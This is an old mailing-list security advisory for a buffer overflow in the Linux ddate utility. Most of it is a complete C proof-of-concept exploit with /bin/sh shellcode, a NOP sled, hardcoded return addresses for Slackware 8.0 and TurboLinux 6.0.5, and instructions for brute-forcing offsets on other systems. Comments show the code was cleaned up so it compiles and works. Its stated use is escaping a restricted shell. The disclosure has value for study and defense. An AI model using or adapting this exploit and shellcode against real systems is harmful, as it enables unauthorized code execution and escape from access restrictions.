
Ddate Proof Of Concept Exploit and Bug details


From: <le_costantino () ciudad com ar>
Date: Wed, 17 Apr 2002 02:10:10 -0300

===============================================================================
           [-] Ddate 
           
   [-] Risk: Low. ddate is not installed setuid, so no privileges are gained;
             a user confined to a restricted shell can use the bug to spawn
             a normal, unrestricted sh.
                  
   [-] Date: 30 March of 2002   

           [-] Author: Costantino Leandro
   
   
   [-] Affected:     Slackware 8.0
                     TurboLinux 6.0.5
     Possibly other distributions (untested)

           [-] e-mail: le_costantino () ciudad com ar
   
===============================================================================

1)  Intro
2)  Advisory/Bug
3)  Exploit




--------------------
1  Intro
--------------------

ddate is a program installed by default on many Linux distributions. It
converts Gregorian dates to Discordian dates.

--------------------
2  Adv/Bug
--------------------
The program does not bounds-check the length of the format argument. A
command line such as

    ddate +[STRING longer than 420 bytes]

causes a segmentation fault.

On Slackware 8.0 an argument longer than 420 bytes overwrites the saved
return address (EIP), so arbitrary code can be executed -- in the context of
the invoking user only, since ddate is not setuid.

On TurboLinux 6.0.5 the buffer is 5 bytes shorter: 415 bytes are enough to
overwrite EIP.
      

----------------------
3 Exploit 
----------------------

/* /usr/bin/ddate exploit, proof of concept

   OS: Linux. Return addresses are supplied for Slackware 8.0 and
       TurboLinux 6.0.5; on other distributions you must find a working
       return address yourself (selection 0 plus an offset) or brute-force
       the offset.

   Author:  Costantino Leandro     le_costantino () ciudad com ar

   Risk: Low. ddate is not setuid, so no privileges are gained; a user
         confined to a restricted shell can use it to obtain a 'new',
         unrestricted sh.

   Date: 30/03/2001
*/

  
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>


/* Argument length used against Slackware 8.0: the 420 bytes needed to
 * reach the saved return address plus 100 bytes of slack so the sprayed
 * address overwrites it even if the exact distance is slightly off. */

#define buffer_size  520

/* TurboLinux 6.0.5 needs 5 bytes less (415 + 100). */

#define turbo_size  515

/* Candidate return addresses the author observed on Slackware 8.0.
 * Which one works varies from run to run, hence several are offered
 * (RET, RET2, ...); the chosen value is adjusted by the user-supplied
 * offset before use. */
#define RET         0xbfffe5ed /* Slackware 8.0 */
#define RET2        0xbfffd477
#define RET3        0xbffff9ac
#define RET4        0xbffff64d

/* Candidate return addresses the author observed on TurboLinux 6.0.5. */
#define RET5        0x7ffffb74
#define RET6        0x7ffffba1
#define RET7        0x7ffffb6a
#define RET8        0x7ffffb4c

/* Default offset subtracted from the selected address when none is given
 * on the command line. */
#define doffset      0
/* i386 NOP opcode used to pad the landing zone in front of the shellcode. */
#define NOP          0x90

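/* The "+" prefix that makes ddate treat the rest of the argument as a
 * format string; it is prepended to the payload before execl().
 * The archive mangled the double quotes into single quotes, which turns
 * this into an invalid array initializer -- restored here. */
char operador[] = "+";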

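/* Return the current stack pointer, used as the base for RET-Selection 0
 * when no precomputed address fits the target.
 *
 * The original relied on `movl %esp,%eax` leaving the value in the
 * return register with no explicit `return`, which only works by
 * accident of codegen; the value is now returned through an output
 * operand.  On non-i386 hosts (where this exploit cannot run anyway)
 * the address of a stack local is used so the file still builds. */
unsigned long get_sp(void)
{
    unsigned long sp;

#if defined(__i386__)
    __asm__ __volatile__("movl %%esp, %0" : "=r"(sp));
#else
    sp = (unsigned long)&sp;
#endif
    return sp;
}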
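/* 45-byte i386 Linux execve("/bin/sh") shellcode.  It must contain no
 * zero byte, because the payload reaches ddate through strcat()/execl()
 * as a C string and would be truncated at the first NUL.
 * The archive mangled the double quotes into single quotes -- restored. */
char shellcode[] =
      "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
      "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
      "\x80\xe8\xdc\xff\xff\xff/bin/sh";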

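/* Print the usage text and exit with status 1.  Never returns.
 *
 * The original passed the text to printf() as a format string and
 * spread one literal over several physical lines, which is not valid C;
 * the text is emitted with fputs() from a properly concatenated literal. */
void help(void)
{
    fputs(
        "#####################################################\n"
        "DDATE Xploit  (Slackware 8.0/TurboLinux 6.0.5)\n"
        "--------------------------------------------------\n"
        "Use:  ./dxploit RET-Selection Offset (default 0)\n"
        "--------------------------------------------------\n"
        "RET-Selection:\n"
        "\n"
        "Slackware 8.0                                Turbolinux 6.0.5\n"
        "\n"
        "1   0xbfffe5ed                               5 0x7ffffb74\n"
        "2   0xbfffd477                               6 0x7ffffba1\n"
        "3   0xbffff9ac                               7 0x7ffffb6a\n"
        "4   0xbffff64d                               8 0x7ffffb4c\n"
        "\n"
        "0 Get current address (for other distros) use with differents offsets\n"
        "###########################################################\n\n",
        stdout);
    exit(1);
}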
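/* Map a RET-Selection (0..8) and an offset to the return address to
 * spray.  Selection 0 uses the current stack pointer; 1-4 are the
 * Slackware candidates, 5-8 the TurboLinux ones.  Returns 0 on success,
 * -1 when sel is out of range.
 *
 * The original switch had no `break` after `case 0`, so selection 0 fell
 * through into `case 1` and silently used RET instead of get_sp(). */
static int select_address(int sel, long offset, uint32_t *out)
{
    static const unsigned long table[] = {
        0, RET, RET2, RET3, RET4, RET5, RET6, RET7, RET8
    };
    unsigned long base;

    if (sel < 0 || sel > 8)
        return -1;
    base = (sel == 0) ? get_sp() : table[sel];
    *out = (uint32_t)(base - (unsigned long)offset);
    return 0;
}

/* True if any byte of v is zero.  Such an address cannot be delivered:
 * snprintf()/execl() treat the payload as a C string and stop at NUL. */
static int has_nul_byte(uint32_t v)
{
    unsigned i;

    for (i = 0; i < sizeof v; i++)
        if (((v >> (8 * i)) & 0xffu) == 0)
            return 1;
    return 0;
}

/* Lay out the payload in buf[0..len): the first half is NOPs with the
 * shellcode centred in it, the second half repeats the 32-bit return
 * address; the last byte is NUL so the buffer is a C string.
 * Returns -1 if the shellcode does not fit in the NOP half.
 *
 * The address is copied as exactly four bytes in host byte order (the
 * target is little-endian i386).  The original stored it through a
 * `long *` in steps of 4, which on the 515-byte TurboLinux buffer wrote
 * one byte past the allocation and on an LP64 host would write eight
 * bytes per step. */
static int build_payload(char *buf, size_t len, uint32_t address)
{
    size_t i;
    size_t half = len / 2;
    size_t sc_len = strlen(shellcode);

    if (len == 0 || sc_len > half)
        return -1;

    for (i = 0; i + sizeof address <= len; i += sizeof address)
        memcpy(buf + i, &address, sizeof address);
    memset(buf + i, NOP, len - i);          /* tail when len % 4 != 0 */

    memset(buf, NOP, half);
    memcpy(buf + (half - sc_len / 2), shellcode, sc_len);

    buf[len - 1] = '\0';
    return 0;
}

/* Usage: ./dxploit RET-Selection [Offset]
 *
 * Builds "+<payload>" and execs /usr/bin/ddate with it, replacing this
 * process.  Returns 1 (after printing a message) on bad arguments,
 * allocation failure or if execl() fails.  Usage errors go through
 * help(), which exits. */
int main(int argc, char *argv[])
{
    long offset = doffset;
    size_t bsize = buffer_size;
    int selection;
    uint32_t address;
    char *payload;
    char *end;
    int n;
    /* "+" + payload (at most buffer_size - 1 chars) + NUL. */
    char codex[buffer_size + 2];

    if (argc < 2)
        help();                         /* exits */

    selection = (int)strtol(argv[1], &end, 10);
    if (end == argv[1] || *end != '\0') {
        fprintf(stderr, "Error: RET-Selection must be a number from 0 to 8\n");
        help();
    }
    if (argc > 2) {
        offset = strtol(argv[2], &end, 10);
        if (end == argv[2] || *end != '\0') {
            fprintf(stderr, "Error: Offset must be an integer\n");
            help();
        }
    }

    if (select_address(selection, offset, &address) != 0) {
        /* The original printed this after help(), which never returns,
         * and claimed the valid range was 1 to 8 although 0 is accepted. */
        fprintf(stderr, "Error: not a valid RET-Selection, must be 0 to 8\n");
        help();
    }

    /* Selections 5-8 target TurboLinux, whose buffer is 5 bytes shorter. */
    if (selection >= 5)
        bsize = turbo_size;

    if (has_nul_byte(address))
        fprintf(stderr,
                "Warning: address %08lx contains a zero byte; the argument "
                "will be truncated there\n", (unsigned long)address);

    payload = malloc(bsize);
    if (!payload) {
        printf("cannot allocate memory\n");
        return 1;
    }

    printf("########################################\n");
    printf("DDATE Xploit  (Slackware 8.0/TurboLinux 6.0.5)\n");
    printf("Using address= %lx\n", (unsigned long)address);
    printf("Offset = %ld\n", offset);
    printf("Type ./dxploit for help\n");
    printf("########################################\n\n");

    if (build_payload(payload, bsize, address) != 0) {
        fprintf(stderr, "shellcode does not fit in the payload\n");
        free(payload);
        return 1;
    }

    /* Equivalent of running: ddate +<payload> */
    n = snprintf(codex, sizeof codex, "%s%s", operador, payload);
    if (n < 0 || (size_t)n >= sizeof codex) {
        fprintf(stderr, "payload does not fit in the argument buffer\n");
        free(payload);
        return 1;
    }

    /* The argument list must end in a (char *)NULL, not a bare 0: on
     * LP64 hosts an int 0 is only four bytes of the eight execl reads. */
    execl("/usr/bin/ddate", "ddate", codex, (char *)NULL);

    /* Only reached if the exec failed. */
    perror("execl /usr/bin/ddate");
    free(payload);
    return 1;
}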







